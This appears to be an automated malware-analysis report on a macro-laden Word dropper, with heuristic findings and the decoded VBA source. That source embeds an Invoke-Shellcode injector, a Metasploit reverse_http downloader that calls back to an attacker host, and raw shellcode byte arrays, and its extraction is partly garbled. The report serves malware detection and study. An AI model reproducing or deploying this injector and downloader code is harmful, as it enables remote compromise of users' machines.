Verdict: MALICIOUS
Risk Score: 666

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1059.001 PowerShell
- T1204.002 Malicious File
- T1087.001 Local Account
The sample contains multiple VBA macros designed to execute code, including references to PowerShell and WMI for process creation. The AutoOpen, Auto_Open, and Document_Open macros all call a function 'P' which appears to construct and execute PowerShell commands. The reconstructed PowerShell command includes a reference to '192.168.1.29.1' which is likely a C2 server for a reverse HTTP meterpreter payload. The presence of VirtualAlloc and WriteProcessMemory API calls suggests the execution of shellcode.
Heuristics (18)

- CVE-2007-3899, Microsoft Word malformed string memory corruption (critical, CVE_2007_3899): Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
- ClamAV: Doc.Dropper.Donoff-5743532-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Donoff-5743532-0.
- Reference to WriteProcessMemory API (critical, SC_STR_WRITEPROCESSMEMORY).
- Reference to CreateRemoteThread API (critical, SC_STR_CREATEREMOTETHREAD).
- VBA macros detected (medium, OLE_VBA_MACROS, 8 related findings): Document contains VBA macro code.
- Potential Shell call in VBA (critical, OLE_VBA_SHELL). Matched line in script: `[Sy" jC = jC + "stem.Runtime.InteropServices.Marshal]::Copy($Shell" jC = jC + "code, 0, $BaseAddress, $Shellcode.Length)"`
- PowerShell reference in VBA (critical, OLE_VBA_PS). Matched line in script: `" jC = jC + " if ((!$IsWow64) -and $PowerShell32bit)" "`
- VBA WMI Win32_Process launcher (critical, OLE_VBA_WMI_PROCESS_CREATE): VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions. Matched line in script: `strComputer = "." Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") Set objStartup = objWMIService.Get("Win32_ProcessStartup")`
- GetObject call (high, OLE_VBA_GETOBJ). Matched line in script: `strComputer = "." Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") Set objStartup = objWMIService.Get("Win32_ProcessStartup")`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched line in script: `Sub AutoOpen() P`
- Document_Open macro (low, OLE_VBA_DOCOPEN). Matched line in script: `Sub Document_Open() P`
- Auto_Open macro (low, OLE_VBA_AUTO). Matched line in script: `Attribute VB_Customizable = True Sub Auto_Open() P`
- Reference to PowerShell (high, SC_STR_POWERSHELL).
- Reference to GetProcAddress API (high, SC_STR_GETPROCADDRESS).
- Reference to VirtualAlloc API (medium, SC_STR_VIRTUALALLOC).
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body).
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 32119 bytes |

SHA-256: 68e73dbc0fe17466fea2dad8c4ecb16be3304933b8ffa998b4450b19207117d4

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Auto_Open()
P
End Sub
Sub AutoOpen()
P
End Sub
Sub Document_Open()
P
End Sub
Public Function P() As Variant
Dim jC As String
jC = "function Invoke-Shellcode"
{
[CmdletBinding( Defa"
jC = jC + "ultParameterSetName = 'RunLocal', SupportsShouldPr"
jC = jC + "ocess = $True , ConfirmImpact = 'High')] Param ("
"
jC = jC + " [ValidateNotNullOrEmpty()]"
[UInt16]
"
jC = jC + "$ProcessID,"
[Parameter( ParameterSetName = 'R"
jC = jC + "unLocal' )]"
[ValidateNotNullOrEmpty()]
["
jC = jC + "Byte[]]"
$Shellcode,
[Parameter( Paramete"
jC = jC + "rSetName = 'Metasploit' )]"
[ValidateSet( 'win"
jC = jC + "dows/meterpreter/reverse_http',"
"
jC = jC + " 'windows/meterpreter/reverse_https',"
"
jC = jC + " IgnoreCase = $True )]"
[String]
$P"
jC = jC + "ayload = 'windows/meterpreter/reverse_http',"
"
jC = jC + "[Parameter( ParameterSetName = 'ListPayloads' )]"
"
jC = jC + " [Switch]"
$ListMetasploitPayloads,
[P"
jC = jC + "arameter( Mandatory = $True,"
Para ""
jC = jC + "meterSetName = 'Metasploit' )]"
[ValidateNotNu"
jC = jC + "llOrEmpty()]"
[String]
$Lhost = '192.168.1.29."
jC = jC + "1',"
[Parameter( Mandatory = $True,
"
jC = jC + " ParameterSetName = 'Metasploit' )]"
[Va"
jC = jC + "lidateRange( 1,65535 )]"
[Int]
$Lport = 80"
jC = jC + "443,"
[Parameter( ParameterSetName = 'Metasplo"
jC = jC + "it' )]"
[ValidateNotNull()]
[String]
"
jC = jC + " $UserAgent = (Get-ItemProperty -Path 'HKCU:\Softw"
jC = jC + "are\Microsoft\Windows\CurrentVersion\Internet Sett"
jC = jC + "ings').'User Agent',"
[Parameter( ParameterSet"
jC = jC + "Name = 'Metasploit' )]"
[ValidateNotNull()]
"
jC = jC + " [Switch]"
$Legacy = $False,
[Parameter"
jC = jC + "( ParameterSetName = 'Metasploit' )]"
[Validat"
jC = jC + "eNotNull()]"
[Switch]
$Proxy = $False,
"
jC = jC + " [Switch]"
$Force = $False
)
Set-Stric"
jC = jC + "tMode -Version 2.0"
if ($PsCmdlet.ParameterSet"
jC = jC + "Name -eq 'ListPayloads')"
{
$Availabl"
jC = jC + "ePayloads = (Get-Command Invoke-Shellcode).Paramet"
jC = jC + "ers['Payload'].Attributes |"
Where-Obj"
jC = jC + "ect {$_.TypeId -eq [System.Management.Automation.V"
jC = jC + "alidateSetAttribute]}"
foreach ($Payload i"
jC = jC + "n $AvailablePayloads.ValidValues)"
{
"
jC = jC + " New-Object PSObject -Property @{ Payloads "
jC = jC + "= $Payload }"
}
Return
}
"
jC = jC + " if ( $PSBoundParameters['ProcessID'] )"
{
"
jC = jC + " Get-Process -Id $ProcessID -ErrorAction Sto"
jC = jC + "p | Out-Null"
}
function Local:Get-Delega"
jC = jC + "teType"
{
Param
(
"
jC = jC + " [OutputType([Type])]"
[Parameter( P"
jC = jC + "osition = 0)]"
[Type[]]
$"
jC = jC + "Parameters = (New-Object Type[](0)),"
"
jC = jC + "[Parameter( Position = 1 )]"
[Type]
"
jC = jC + " $ReturnType = [Void]"
)
"
jC = jC + " $Domain = [AppDomain]::CurrentDomain"
$D"
jC = jC + "ynAssembly = New-Object System.Reflection.Assembly"
jC = jC + "Name('ReflectedDelegate')"
$AssemblyBuilde"
jC = jC + "r = $Domain.DefineDynamicAssembly($DynAssembly, [S"
jC = jC + "ystem.Reflection.Emit.AssemblyBuilderAccess]::Run)"
jC = jC + ""
$ModuleBuilder = $AssemblyBuilder.Define"
jC = jC + "DynamicModule('InMemoryModule', $false)"
$"
jC = jC + "TypeBuilder = $ModuleBuilder.DefineType('MyDelegat"
jC = jC + "eType', 'Class, Public, Sealed, AnsiClass, AutoCla"
jC = jC + "ss', [System.MulticastDelegate])"
$Constru"
jC = jC + "ctorBuilder = $TypeBuilder.DefineConstructor('RTSp"
jC = jC + "ecialName, HideBySig, Public', [System.Reflection."
jC = jC + "CallingConventions]::Standard, $Parameters)"
"
jC = jC + " $ConstructorBuilder.SetImplementationFlags('Run"
jC = jC + "time, Managed')"
$MethodBuilder = $TypeBui"
jC = jC + "lder.DefineMethod('Invoke', 'Public, HideBySig, Ne"
jC = jC + "wSlot, Virtual', $ReturnType, $Parameters)"
"
jC = jC + " $MethodBuilder.SetImplementationFlags('Runtime, "
jC = jC + "Managed')"
Write-Output $TypeBuilder.Creat"
jC = jC + "eType()"
}
function Local:Get-ProcAddress"
jC = jC + ""
{
Param
(
[Ou"
jC = jC + "tputType([IntPtr])]"
[Parameter( Posit"
jC = jC + "ion = 0, Mandatory = $True )]"
[String"
jC = jC + "]"
$Module,
[Parameter( P"
jC = jC + "osition = 1, Mandatory = $True )]"
[St"
jC = jC + "ring]"
$Procedure
)
"
jC = jC + "$SystemAssembly = [AppDomain]::CurrentDomain.GetAs"
jC = jC + "semblies() |"
Where-Object { $_.Global"
jC = jC + "AssemblyCache -And $_.Location.Split('\\')[-1].Equ"
jC = jC + "als('System.dll') }"
$UnsafeNativeMethods "
jC = jC + "= $SystemAssembly.GetType('Microsoft.Win32.UnsafeN"
jC = jC + "ativeMethods')"
$GetModuleHandle = $Unsafe"
jC = jC + "NativeMethods.GetMethod('GetModuleHandle')"
"
jC = jC + " $GetProcAddress = $UnsafeNativeMethods.GetMethod"
jC = jC + "('GetProcAddress')"
$Kern32Handle = $GetMo"
jC = jC + "duleHandle.Invoke($null, @($Module))"
$tmp"
jC = jC + "Ptr = New-Object IntPtr"
$HandleRef = New-"
jC = jC + "Object System.Runtime.InteropServices.HandleRef($t"
jC = jC + "mpPtr, $Kern32Handle)"
Write-Output $GetPr"
jC = jC + "ocAddress.Invoke($null, @([System.Runtime.InteropS"
jC = jC + "ervices.HandleRef]$HandleRef, $Procedure))"
}
"
jC = jC + ""
function Local:Emit-CallThreadStub ([IntPtr] "
jC = jC + "$BaseAddr, [IntPtr] $ExitThreadAddr, [Int] $Archit"
jC = jC + "ecture)"
{
$IntSizePtr = $Architectur"
jC = jC + "e / 8"
function Local:ConvertTo-LittleEndi"
jC = jC + "an ([IntPtr] $Address)"
{
$Li"
jC = jC + "ttleEndianByteArray = New-Object Byte[](0)"
"
jC = jC + " $Address.ToString("X$($IntSizePtr*2)") -spli"
jC = jC + "t '([A-F0-9]{2})' | ForEach-Object { if ($_) { $Li"
jC = jC + "ttleEndianByteArray += [Byte] ('0x{0}' -f $_) } }"
"
jC = jC + ""
[System.Array]::Reverse($LittleEndian"
jC = jC + "ByteArray)"
Write-Output $LittleEndian"
jC = jC + "ByteArray"
}
$CallStub = New-Obje"
jC = jC + "ct Byte[](0)"
if ($IntSizePtr -eq 8)
"
jC = jC + " {"
[Byte[]] $CallStub = 0x48,0xB8 "
jC = jC + " # MOV QWORD RAX, &shellcode"
jC = jC + ""
$CallStub += ConvertTo-LittleEndian "
jC = jC + "$BaseAddr # &shellcode"
$CallStu"
jC = jC + "b += 0xFF,0xD0 # CALL"
jC = jC + " RAX"
$CallStub += 0x6A,0x00 "
jC = jC + " # PUSH BYTE 0"
$"
jC = jC + "CallStub += 0x48,0xB8 "
jC = jC + " # MOV QWORD RAX, &ExitThread"
$Call"
jC = jC + "Stub += ConvertTo-LittleEndian $ExitThreadAddr # &"
jC = jC + "ExitThread"
$CallStub += 0xFF,0xD0 "
jC = jC + " # CALL RAX"
}
"
jC = jC + " else"
{
[Byte[]] $Cal"
jC = jC + "lStub = 0xB8 # MOV DWO"
jC = jC + "RD EAX, &shellcode"
$CallStub += Conve"
jC = jC + "rtTo-LittleEndian $BaseAddr # &shellcode"
"
jC = jC + " $CallStub += 0xFF,0xD0 "
jC = jC + " # CALL EAX"
$CallStub += "
jC = jC + "0x6A,0x00 # PUSH BYT"
jC = jC + "E 0"
$CallStub += 0xB8 "
jC = jC + " # MOV DWORD EAX, &ExitThread"
"
jC = jC + ""
$CallStub += ConvertTo-LittleEndian $"
jC = jC + "ExitThreadAddr # &ExitThread"
$CallStu"
jC = jC + "b += 0xFF,0xD0 # CALL"
jC = jC + " EAX"
}
Write-Output $CallStub
"
jC = jC + " }"
function Local:Inject-RemoteShellcode ("
jC = jC + "[Int] $ProcessID)"
{
$hProcess = $Ope"
jC = jC + "nProcess.Invoke(0x001F0FFF, $false, $ProcessID) # "
jC = jC + "ProcessAccessFlags.All (0x001F0FFF)"
if (!"
jC = jC + "$hProcess)"
{
Throw "Unable t"
jC = jC + "o open a process handle for PID: $ProcessID"
"
jC = jC + " }"
$IsWow64 = $false
if ($64b"
jC = jC + "itCPU) # Only perform theses checks if CPU is 64-b"
jC = jC + "it"
{
$IsWow64Process.Invoke("
jC = jC + "$hProcess, [Ref] $IsWow64) | Out-Null"
"
jC = jC + " if ((!$IsWow64) -and $PowerShell32bit)"
"
jC = jC + " {"
Throw 'Unable to inject 64-b"
jC = jC + "it shellcode from within 32-bit Powershell. Use th"
jC = jC + "e 64-bit version of Powershell if you want this to"
jC = jC + " work.'"
}
elseif ($IsWow"
jC = jC + "64) # 32-bit Wow64 process"
{
"
jC = jC + " if ($Shellcode32.Length -eq 0)"
"
jC = jC + " {"
Throw 'No shellcode "
jC = jC + "was placed in the $Shellcode32 variable!'"
"
jC = jC + " }"
$Shellcode = $Shellcod"
jC = jC + "e32"
}
else # 64-bit proc"
jC = jC + "ess"
{
if ($Shellcode"
jC = jC + "64.Length -eq 0)"
{
"
jC = jC + " Throw 'No shellcode was placed in the $Shel"
jC = jC + "lcode64 variable!'"
}
"
jC = jC + " $Shellcode = $Shellcode64"
}
"
jC = jC + " }"
else # 32-bit CPU
{
"
jC = jC + " if ($Shellcode32.Length -eq 0)"
"
jC = jC + " {"
Throw 'No shellcode was place"
jC = jC + "d in the $Shellcode32 variable!'"
}
"
jC = jC + " $Shellcode = $Shellcode32"
}
"
jC = jC + " $RemoteMemAddr = $VirtualAllocEx.Invoke($hP"
jC = jC + "rocess, [IntPtr]::Zero, $Shellcode.Length + 1, 0x3"
jC = jC + "000, 0x40) # (Reserve|Commit, RWX)"
if (!$"
jC = jC + "RemoteMemAddr)"
{
Throw "Unab"
jC = jC + "le to allocate shellcode memory in PID: $ProcessID"
jC = jC + ""
}
$WriteProcessMemory.Invoke($"
jC = jC + "hProcess, $RemoteMemAddr, $Shellcode, $Shellcode.L"
jC = jC + "ength, [Ref] 0) | Out-Null"
$ExitThreadAdd"
jC = jC + "r = Get-ProcAddress kernel32.dll ExitThread"
"
jC = jC + " if ($IsWow64)"
{
$CallStub"
jC = jC + " = Emit-CallThreadStub $RemoteMemAddr $ExitThreadA"
jC = jC + "ddr 32"
}
Else
{
"
jC = jC + " $CallStub = Emit-CallThreadStub $RemoteMemAd"
jC = jC + "dr $ExitThreadAddr 64"
}
$RemoteS"
jC = jC + "tubAddr = $VirtualAllocEx.Invoke($hProcess, [IntPt"
jC = jC + "r]::Zero, $CallStub.Length, 0x3000, 0x40) # (Reser"
jC = jC + "ve|Commit, RWX)"
if (!$RemoteStubAddr)
"
jC = jC + " {"
Throw "Unable to allocate thr"
jC = jC + "ead call stub memory in PID: $ProcessID"
"
jC = jC + "}"
$WriteProcessMemory.Invoke($hProcess, $"
jC = jC + "RemoteStubAddr, $CallStub, $CallStub.Length, [Ref]"
jC = jC + " 0) | Out-Null"
$ThreadHandle = $CreateRem"
jC = jC + "oteThread.Invoke($hProcess, [IntPtr]::Zero, 0, $Re"
jC = jC + "moteStubAddr, $RemoteMemAddr, 0, [IntPtr]::Zero)"
"
jC = jC + " if (!$ThreadHandle)"
{
"
jC = jC + " Throw "Unable to launch remote thread in PID: $P"
jC = jC + "rocessID"
}
$CloseHandle.Invoke("
jC = jC + "$hProcess) | Out-Null"
}
function Local:I"
jC = jC + "nject-LocalShellcode"
{
if ($PowerShe"
jC = jC + "ll32bit) {"
if ($Shellcode32.Length -e"
jC = jC + "q 0)"
{
Throw 'No she"
jC = jC + "llcode was placed in the $Shellcode32 variable!'"
"
jC = jC + " return"
}
"
jC = jC + " $Shellcode = $Shellcode32"
}
els ""
jC = jC + "e"
{
if ($Shellcode64.Length "
jC = jC + "-eq 0)"
{
Throw 'No s"
jC = jC + "hellcode was placed in the $Shellcode64 variable!'"
jC = jC + ""
Return
}
"
jC = jC + " $Shellcode = $Shellcode64"
}
$"
jC = jC + "BaseAddress = $VirtualAlloc.Invoke([IntPtr]::Zero,"
jC = jC + " $Shellcode.Length + 1, 0x3000, 0x40) # (Reserve|C"
jC = jC + "ommit, RWX)"
if (!$BaseAddress)
{"
jC = jC + ""
Throw "Unable to allocate shellcode "
jC = jC + "memory in PID: $ProcessID"
}
[Sy"
jC = jC + "stem.Runtime.InteropServices.Marshal]::Copy($Shell"
jC = jC + "code, 0, $BaseAddress, $Shellcode.Length)"
"
jC = jC + " $ExitThreadAddr = Get-ProcAddress kernel32.dll Ex"
jC = jC + "itThread"
if ($PowerShell32bit)
{"
jC = jC + ""
$CallStub = Emit-CallThreadStub $Bas"
jC = jC + "eAddress $ExitThreadAddr 32"
}
el ""
jC = jC + "se"
{
$CallStub = Emit-CallTh"
jC = jC + "readStub $BaseAddress $ExitThreadAddr 64"
"
jC = jC + "}"
$CallStubAddress = $VirtualAlloc.Invoke"
jC = jC + "([IntPtr]::Zero, $CallStub.Length + 1, 0x3000, 0x4"
jC = jC + "0) # (Reserve|Commit, RWX)"
if (!$CallStub"
jC = jC + "Address)"
{
Throw "Unable to "
jC = jC + "allocate thread call stub."
}
[S"
jC = jC + "ystem.Runtime.InteropServices.Marshal]::Copy($Call"
jC = jC + "Stub, 0, $CallStubAddress, $CallStub.Length)"
"
jC = jC + " $ThreadHandle = $CreateThread.Invoke([IntPtr]:"
jC = jC + ":Zero, 0, $CallStubAddress, $BaseAddress, 0, [IntP"
jC = jC + "tr]::Zero)"
if (!$ThreadHandle)
{"
jC = jC + ""
Throw "Unable to launch thread."
"
jC = jC + " }"
$WaitForSingleObject.Invoke($Thre"
jC = jC + "adHandle, 0xFFFFFFFF) | Out-Null"
$Virtual"
jC = jC + "Free.Invoke($CallStubAddress, $CallStub.Length + 1"
jC = jC + ", 0x8000) | Out-Null # MEM_RELEASE (0x8000)"
"
jC = jC + " $VirtualFree.Invoke($BaseAddress, $Shellcode.Le"
jC = jC + "ngth + 1, 0x8000) | Out-Null # MEM_RELEASE (0x8000"
jC = jC + ")"
}
$IsWow64ProcessAddr = Get-ProcAddres"
jC = jC + "s kernel32.dll IsWow64Process"
if ($IsWow64Pro"
jC = jC + "cessAddr)"
{
$IsWow64ProcessDelegate "
jC = jC + "= Get-DelegateType @([IntPtr], [Bool].MakeByRefTyp"
jC = jC + "e()) ([Bool])"
$IsWow64Process = [System.R"
jC = jC + "untime.InteropServices.Marshal]::GetDelegateForFun"
jC = jC + "ctionPointer($IsWow64ProcessAddr, $IsWow64ProcessD"
jC = jC + "elegate)"
$64bitCPU = $true
}
el ""
jC = jC + "se"
{
$64bitCPU = $false
}
"
jC = jC + "if ([IntPtr]::Size -eq 4)"
{
$PowerSh"
jC = jC + "ell32bit = $true"
}
Else
{
"
jC = jC + "$PowerShell32bit = $false"
}
if ($PsCmdle"
jC = jC + "t.ParameterSetName -eq 'Metasploit')"
{
"
jC = jC + " if (!$PowerShell32bit) {"
$RootInvo"
jC = jC + "cation = $MyInvocation.Line"
$Response"
jC = jC + " = $True"
if ( $Force -or ( $Response "
jC = jC + "= $psCmdlet.ShouldContinue( "Do you want to launch"
jC = jC + " the payload from x86 Powershell?",
"
jC = jC + " "Attempt to execute 32-bit shellcode from 64"
jC = jC + "-bit Powershell. Note: This process takes about on"
jC = jC + "e minute. Be patient! You will also see some artif"
jC = jC + "acts of the script loading in the other process." "
jC = jC + ") ) ) { }"
if ( !$Response )
"
jC = jC + " {"
Return
}
"
jC = jC + " if ($MyInvocation.BoundParameters['Force']"
jC = jC + ")"
{
$Command = "func"
jC = jC + "tion $($MyInvocation.InvocationName) {`n" + $MyInv"
jC = jC + "ocation.MyCommand.ScriptBlock + "`n}`n$($RootInvoc"
jC = jC + "ation)`n`n"
}
Else
"
jC = jC + " {"
$Command = "function $("
jC = jC + "$MyInvocation.InvocationName) {`n" + $MyInvocation"
jC = jC + ".MyCommand.ScriptBlock + "`n}`n$($RootInvocation) "
jC = jC + "-Force`n`n"
}
$CommandBy"
jC = jC + "tes = [System.Text.Encoding]::Ascii.GetBytes($Comm"
jC = jC + "and)"
$EncodedCommand = [Convert]::ToB"
jC = jC + "ase64String($CommandBytes)"
$Execute ="
jC = jC + " '$Command' + " | $Env:windir\SysWOW64\WindowsPowe"
jC = jC + "rShell\v1.0\powershell.exe -NoProfile -Command -"
"
jC = jC + ""
Invoke-Expression -Command $Execute |"
jC = jC + " Out-Null"
Return
}
"
jC = jC + "$Response = $True"
if ( $Force -or ( $Resp"
jC = jC + "onse = $psCmdlet.ShouldContinue( "Do you know what"
jC = jC + " you're doing?",
"About to downloa"
jC = jC + "d Metasploit payload '$($Payload)' LHOST=$($Lhost)"
jC = jC + ", LPORT=$($Lport)" ) ) ) { }
if ( !$Respo"
jC = jC + "nse )"
{
Return
}
"
jC = jC + " switch ($Payload)"
{
'"
jC = jC + "windows/meterpreter/reverse_http'"
{
"
jC = jC + " $SSL = ''"
}
"
jC = jC + " 'windows/meterpreter/reverse_https'"
"
jC = jC + " {"
$SSL = 's'
"
jC = jC + "[System.Net.ServicePointManager]::ServerCertificat"
jC = jC + "eValidationCallback = {$True}"
}
"
jC = jC + " }"
if ($Legacy)
{
"
jC = jC + " $Request = "http$($SSL)://$($Lhost):$($Lport)/I"
jC = jC + "NITM"
} else {
$CharArray = "
jC = jC + "48..57 + 65..90 + 97..122 | ForEach-Object {[Char]"
jC = jC + "$_}"
$SumTest = $False
wh ""
jC = jC + "ile ($SumTest -eq $False) "
{
"
jC = jC + " $GeneratedUri = $CharArray | Get-Random -"
jC = jC + "Count 4"
$SumTest = (([int[]] $Gen"
jC = jC + "eratedUri | Measure-Object -Sum).Sum % 0x100 -eq 9"
jC = jC + "2)"
}
$RequestUri = -join"
jC = jC + " $GeneratedUri"
$Request = "http$($SSL"
jC = jC + ")://$($Lhost):$($Lport)/$($RequestUri)"
"
jC = jC + "}"
$Uri = New-Object Uri($Request)
"
jC = jC + " $WebClient = New-Object System.Net.WebClient"
"
jC = jC + " $WebClient.Headers.Add('user-agent', "$UserA"
jC = jC + "gent")
if ($Proxy)
{
"
jC = jC + " $WebProxyObject = New-Object System.Net.WebProxy"
jC = jC + ""
$ProxyAddress = (Get-ItemProperty -P"
jC = jC + "ath 'HKCU:\Software\Microsoft\Windows\CurrentVersi"
jC = jC + "on\Internet Settings').ProxyServer"
if"
jC = jC + " ($ProxyAddress) "
{
"
jC = jC + "$WebProxyObject.Address = $ProxyAddress"
"
jC = jC + " $WebProxyObject.UseDefaultCredentials = $Tr"
jC = jC + "ue"
$WebClientObject.Proxy = $WebP"
jC = jC + "roxyObject"
}
}
try
"
jC = jC + ""
{
[Byte[]] $Shellcode32 = $W"
jC = jC + "ebClient.DownloadData($Uri)"
}
ca ""
jC = jC + "tch"
{
Throw "$($Error[0].Exc"
jC = jC + "eption.InnerException.InnerException.Message)"
"
jC = jC + " }"
[Byte[]] $Shellcode64 = $Shellcod"
jC = jC + "e32"
}
elseif ($PSBoundParameters['Shellc"
jC = jC + "ode'])"
{
[Byte[]] $Shellcode32 = $Sh"
jC = jC + "ellcode"
[Byte[]] $Shellcode64 = $Shellcod"
jC = jC + "e32"
}
Else
{
[Byte[]] $She"
jC = jC + "llcode32 = @(0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x"
jC = jC + "89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,"
"
jC = jC + " 0x52,0x0c,0x8b,0x52,0"
jC = jC + "x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0"
jC = jC + "x31,0xc0,"
0 xac , ""
jC = jC + "0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,"
jC = jC + "0xc7,0xe2,0xf0,0x52,0x57,"
"
jC = jC + " 0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0"
jC = jC + ",0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,"
"
jC = jC + " 0xd0,0x50,0x8b,0x48,0x1"
jC = jC + "8,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x3"
jC = jC + "4,0x8b,"
0x01,0x"
jC = jC + "d6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0x"
jC = jC + "c7,0x38,0xe0,0x75,0xf4,"
"
jC = jC + " 0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0"
jC = jC + "x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,"
"
jC = jC + " 0x0c,0x4b,0x8b,0x58,0x1c,"
jC = jC + "0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,"
jC = jC + "0x24,"
0x5b,0x5b"
jC = jC + ",0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b"
jC = jC + ",0x12,0xeb,0x86,0x5d,"
"
jC = jC + " 0x6a,0x01,0x8d,0x85,0xb9,0x00,0x00,0x00,0x5"
jC = jC + "0,0x68,0x31,0x8b,0x6f,0x87,0xff,0xd5,"
"
jC = jC + " 0xbb,0xe0,0x1d,0x2a,0x0a,0x"
jC = jC + "68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x06,0x7c,0x"
jC = jC + "0a,"
0x80,0xfb,0"
jC = jC + "xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0"
jC = jC + "x53,0xff,0xd5,0x63,"
"
jC = jC + " 0x61,0x6c,0x63,0x00)"
[Byte[]] $Shell"
jC = jC + "code64 = @(0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00"
jC = jC + ",0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,"
"
jC = jC + " 0x56,0x48,0x31,0xd2,0x6"
jC = jC + "5,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8"
jC = jC + "b,0x52,"
0x20,0x"
jC = jC + "48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x"
jC = jC + "31,0xc9,0x48,0x31,0xc0,"
"
jC = jC + " 0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0"
jC = jC + "xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,"
"
jC = jC + " 0x52,0x41,0x51,0x48,0x8b,"
jC = jC + "0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,"
jC = jC + "0x88,"
0x00,0x00"
jC = jC + ",0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50"
jC = jC + ",0x8b,0x48,0x18,0x44,"
"
jC = jC + " 0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x4"
jC = jC + "8,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,"
"
jC = jC + " 0x01,0xd6,0x4d,0x31,0xc9,0x"
jC = jC + "48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0x"
jC = jC + "c1,"
0x38,0xe0,0"
jC = jC + "x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0"
jC = jC + "x75,0xd8,0x58,0x44,"
"
jC = jC + " 0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,"
jC = jC + "0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,"
"
jC = jC + " 0x01,0xd0,0x41,0x8b,0x04,0x88"
jC = jC + ",0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a"
jC = jC + ","
0x41,0x58,0x4"
jC = jC + "1,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xf"
jC = jC + "f,0xe0,0x58,0x41,"
"
jC = jC + " 0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0x"
jC = jC + "ff,0x5d,0x48,0xba,0x01,0x00,0x00,"
"
jC = jC + " 0x00,0x00,0x00,0x00,0x00,0x48,0"
jC = jC + "x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,"
"
jC = jC + ""
0x6f,0x87,0xff,"
jC = jC + "0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,"
jC = jC + "0xbd,0x9d,0xff,"
"
jC = jC + " 0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80"
jC = jC + ",0xfb,0xe0,0x75,0x05,0xbb,0x47,"
"
jC = jC + " 0x13,0x72,0x6f,0x6a,0x00,0x59,0x4"
jC = jC + "1,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,0x63,0x00)"
"
jC = jC + " }"
if ( $PSBoundParameters['ProcessID'] )
"
jC = jC + " {"
$OpenProcessAddr = Get-ProcAddress "
jC = jC + "kernel32.dll OpenProcess"
$OpenProcessDele"
jC = jC + "gate = Get-DelegateType @([UInt32], [Bool], [UInt3"
jC = jC + "2]) ([IntPtr])"
$OpenProcess = [System.Run"
jC = jC + "time.InteropServices.Marshal]::GetDelegateForFunct"
jC = jC + "ionPointer($OpenProcessAddr, $OpenProcessDelegate)"
jC = jC + ""
$VirtualAllocExAddr = Get-ProcAddress ke"
jC = jC + "rnel32.dll VirtualAllocEx"
$VirtualAllocEx"
